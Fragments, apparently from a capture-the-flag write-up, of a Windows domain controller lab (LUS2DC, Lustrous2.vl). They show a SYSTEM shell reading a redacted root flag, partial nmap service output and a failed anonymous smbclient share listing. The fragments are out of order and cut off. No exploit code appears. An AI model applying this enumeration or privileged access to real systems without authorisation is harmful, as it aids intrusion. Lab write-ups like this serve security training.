nt authority\system

C:\Users\Administrator\Desktop>hostname
hostname
LUS2DC

C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDACTED}


ROOT.TXT: VL{REDACTED}



445/tcp   open  microsoft-ds?

smbclient -N -L 10.10.66.32
session setup failed: NT_STATUS_NOT_SUPPORTED

#Same as rpcclient: NTLM is disabled, so the anonymous session setup is refused with NT_STATUS_NOT_SUPPORTED before any share access check.

464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
55830/tcp open  msrpc         Microsoft Windows RPC
55859/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: LUS2DC; OS: Windows; CPE: cpe:/o:microsoft:windows